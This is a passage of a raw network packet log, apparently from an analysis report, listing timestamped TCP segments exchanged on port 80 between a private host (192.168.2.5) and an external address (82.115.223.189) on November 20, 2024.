                                          Nov 20, 2024 07:48:02.836680889 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.836693048 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.836716890 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.836750984 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.836760044 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.836786032 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.836828947 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.836836100 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.836870909 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.836914062 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.836925030 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.836960077 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.836992025 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.837006092 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.837025881 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.837059975 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.837070942 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.837093115 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.837126017 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.837143898 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.837161064 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.837193966 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.837219954 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.837225914 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.837275028 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.837280035 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.837315083 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.837347984 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.837357044 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.837380886 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.837410927 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.837425947 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.837460041 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.837493896 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.837510109 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.837528944 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.837567091 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.837585926 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.837604046 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.837647915 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.837656021 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.837743998 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.837778091 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.837791920 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.837810993 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.837843895 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.837866068 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.837896109 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.837929964 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.837940931 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.837985992 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.838021040 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.838027954 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.838072062 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.838131905 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.838134050 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.838181973 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.838217020 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.838227987 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.838249922 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.838287115 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.838293076 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.838320971 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.838354111 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.838367939 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.838387012 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.838419914 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.838432074 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.838452101 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.838485003 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.838494062 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.838517904 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.838553905 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.838562012 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.838587999 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.838623047 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.838633060 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.838655949 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.838690996 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.838711023 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.838723898 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.838757038 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.838766098 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.838790894 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.838824034 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.838835001 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.838876963 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.838911057 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.838920116 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.838948011 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.838972092 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.838982105 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.838994026 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.839011908 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.839045048 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.839056969 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.839078903 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.839112043 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.839123011 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.839144945 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.839178085 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.839204073 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.839211941 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.839245081 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.839257956 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.839279890 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.839312077 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.839339018 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.839374065 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.839407921 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.839417934 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.839442015 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.839476109 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.839485884 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.839509964 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.839543104 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.839551926 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.839581013 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.839615107 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.839622974 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.839648962 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.839680910 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.839692116 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.839715958 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.839749098 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.839757919 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.839782953 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.839814901 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.839824915 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.839848995 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.839880943 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.839891911 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.839915037 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.839946985 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.839958906 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.839982986 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.840014935 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.840020895 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.840049982 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.840082884 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.840094090 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.840116024 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.840148926 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.840153933 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.840184927 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.840226889 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.840943098 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.878401995 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.878456116 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.878472090 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.878488064 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.878504992 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.878521919 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.878537893 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.878555059 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.878726006 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.926748037 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.926822901 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.926886082 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.926887035 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.926940918 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.926981926 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.926990986 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.927036047 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.927069902 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.927084923 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.927103996 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.927138090 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.927149057 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.927190065 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.927234888 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.927252054 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.927301884 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.927352905 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.927366018 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.927400112 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.927445889 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.927452087 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.927510023 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.927561998 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.927563906 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.927597046 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.927630901 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.927661896 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.927664995 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.927700996 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.927717924 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.927755117 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.927788973 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.927803993 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.927838087 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.927870989 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.927885056 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.927903891 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.927937031 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.927942038 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.927969933 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.928013086 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.928020000 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.928056955 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.928102970 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.928107977 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.928142071 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.928184986 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.928195953 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.928253889 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.928297997 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.928306103 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.928355932 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.928388119 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.928401947 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.928425074 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.928458929 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.928479910 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.928493023 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.928528070 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.928536892 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.928561926 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.928608894 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.928612947 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.928663969 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.928697109 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.928709984 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.928730965 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.928764105 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.928776026 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.928822041 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.928854942 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.928873062 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.928905010 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.928941011 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.928955078 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.928972960 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.929007053 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.929018021 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.929035902 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.929069042 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.929080009 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.929104090 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.929136038 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.929145098 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.929168940 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.929200888 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.929212093 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.929234982 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.929267883 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.929289103 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.929301977 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.929335117 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.929348946 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.929368019 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.929399967 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.929409981 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.929434061 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.929462910 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.929474115 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.929496050 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.929534912 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.929538965 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.929569006 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.929604053 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.929614067 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.929636955 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.929670095 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.929681063 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.929702997 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.929735899 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.929742098 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.929769039 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.929802895 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.929810047 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.929836988 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.929869890 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.929877996 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.929899931 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.929903984 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.929935932 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.929944038 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.929969072 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.930002928 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.930011034 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.930035114 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.930068016 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.930083990 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.930103064 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.930135965 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.930149078 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.930170059 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.930202961 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.930217981 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.930234909 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.930268049 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.930285931 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.930299997 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.930334091 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.930341005 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.930366039 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.930398941 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.930408001 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.930432081 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.930464029 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.930474043 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.930496931 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.930533886 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.930540085 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.930567026 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.930602074 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.930608034 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.930634975 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.930669069 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.930680037 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.930701971 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.930737019 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.930744886 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.931931973 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.968892097 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.968983889 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.969044924 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.969079971 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.969114065 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.969119072 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.969149113 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.969156027 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.969177008 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:02.969183922 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.969222069 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:02.969244957 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.016530037 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.017745018 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.017821074 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.017874956 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.017896891 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.017909050 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.017962933 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.017968893 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.017996073 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.018043995 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.018049002 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.018083096 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.018131018 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.018134117 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.018167973 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.018209934 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.018218040 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.018253088 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.018285990 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.018299103 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.018318892 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.018352985 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.018373966 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.018384933 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.018419981 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.018434048 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.018454075 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.018487930 CET804970482.115.223.189192.168.2.5
                                          Nov 20, 2024 07:48:03.018503904 CET4970480192.168.2.582.115.223.189
                                          Nov 20, 2024 07:48:03.018522024 CET804970482.115.223.189192.168.2.5
